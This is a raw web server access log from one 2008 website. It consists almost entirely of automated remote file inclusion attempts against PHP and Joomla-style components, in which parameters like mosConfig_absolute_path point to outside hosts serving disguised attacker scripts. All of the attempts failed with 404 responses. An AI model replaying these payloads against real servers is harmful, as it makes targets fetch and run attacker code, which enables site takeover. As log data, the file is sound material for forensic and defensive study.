72.9.228.149 - - [01/Jun/2008:19:05:08 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:05:08 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:05:08 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
196.41.124.8 - - [01/Jun/2008:19:05:22 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/sofialia76/test.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.mathstamps.com"
196.41.124.8 - - [01/Jun/2008:19:05:32 -0700] "GET /logs/send_reminders.php?includedir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
196.41.124.8 - - [01/Jun/2008:19:05:33 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
166.90.8.230 - - [01/Jun/2008:19:06:32 -0700] "GET /logs/send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
166.90.8.230 - - [01/Jun/2008:19:06:32 -0700] "GET /send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:06:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:06:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:06:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:06:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:06:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
67.205.74.80 - - [01/Jun/2008:19:07:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.160.58 - - [01/Jun/2008:19:07:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.mathstamps.com"
69.61.37.87 - - [01/Jun/2008:19:07:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
211.220.193.170 - - [01/Jun/2008:19:07:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.198.106.61 - - [01/Jun/2008:19:07:46 -0700] "GET /logs/send_reminders.php?includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.198.106.61 - - [01/Jun/2008:19:07:46 -0700] "GET /send_reminders.php?includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
64.185.237.149 - - [01/Jun/2008:19:07:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:07:55 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:19:08:13 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:19:08:14 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.237.236.11 - - [01/Jun/2008:19:08:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
67.43.4.60 - - [01/Jun/2008:19:08:36 -0700] "GET /logs/send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.43.4.60 - - [01/Jun/2008:19:08:36 -0700] "GET /send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
87.106.101.24 - - [01/Jun/2008:19:09:04 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.101.24 - - [01/Jun/2008:19:09:04 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.98.71 - - [01/Jun/2008:19:09:37 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.98.71 - - [01/Jun/2008:19:09:38 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:09:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:09:57 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.246.51.45 - - [01/Jun/2008:19:10:19 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.246.51.45 - - [01/Jun/2008:19:10:19 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:10:21 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:10:22 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:10:22 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
80.32.194.164 - - [01/Jun/2008:19:11:00 -0700] "GET /logs/send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.32.194.164 - - [01/Jun/2008:19:11:01 -0700] "GET /send_reminders.php?includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:11:24 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:11:24 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:11:25 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:11:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
89.108.64.164 - - [01/Jun/2008:19:11:38 -0700] "GET /logs/access_080421.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.64.164 - - [01/Jun/2008:19:11:39 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.64.164 - - [01/Jun/2008:19:11:39 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
164.124.107.55 - - [01/Jun/2008:19:12:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:12:45 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
203.237.236.11 - - [01/Jun/2008:19:12:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:13:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:13:12 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:13:13 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:13:13 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
211.220.193.170 - - [01/Jun/2008:19:14:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:14:21 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
164.124.107.55 - - [01/Jun/2008:19:14:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:15:54 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
66.70.14.90 - - [01/Jun/2008:19:16:33 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.70.14.90 - - [01/Jun/2008:19:16:34 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:16:50 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:16:50 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:16:50 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:16:54 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:17:17 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:17:17 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:17:17 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:19:18:19 -0700] "GET //admin/index.php?path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
194.158.195.132 - - [01/Jun/2008:19:18:19 -0700] "GET /logs//admin/index.php?path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:21:12 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:21:12 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:21:44 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:22:18 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:22:56 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:22:56 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:23:10 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:23:10 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:23:10 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:24:57 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:25:02 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:25:19 -0700] "GET /logs/access_080505.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:25:19 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:25:19 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:27:31 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:27:48 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:27:55 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:27:55 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:28:22 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:24 -0700] "GET /logs/access_080505.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:24 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:24 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:30 -0700] "GET /logs/access_080505.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:30 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:29:30 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.249.73.97 - - [01/Jun/2008:19:30:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
66.249.73.97 - - [01/Jun/2008:19:30:30 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 26133 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:31:17 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:31:32 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:31:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:31:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:31:39 -0700] "GET /logs/access_080505.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:31:39 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:31:39 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:32:15 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:32:15 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:32:15 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.116.7.83 - - [01/Jun/2008:19:32:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_dbquery&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.19.160.58 - - [01/Jun/2008:19:32:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:33:19 -0700] "GET /logs/access_080421.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:34:29 -0700] "GET /logs/access_080428.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:19:34:31 -0700] "GET /logs/access_080428.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:35:07 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:35:07 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
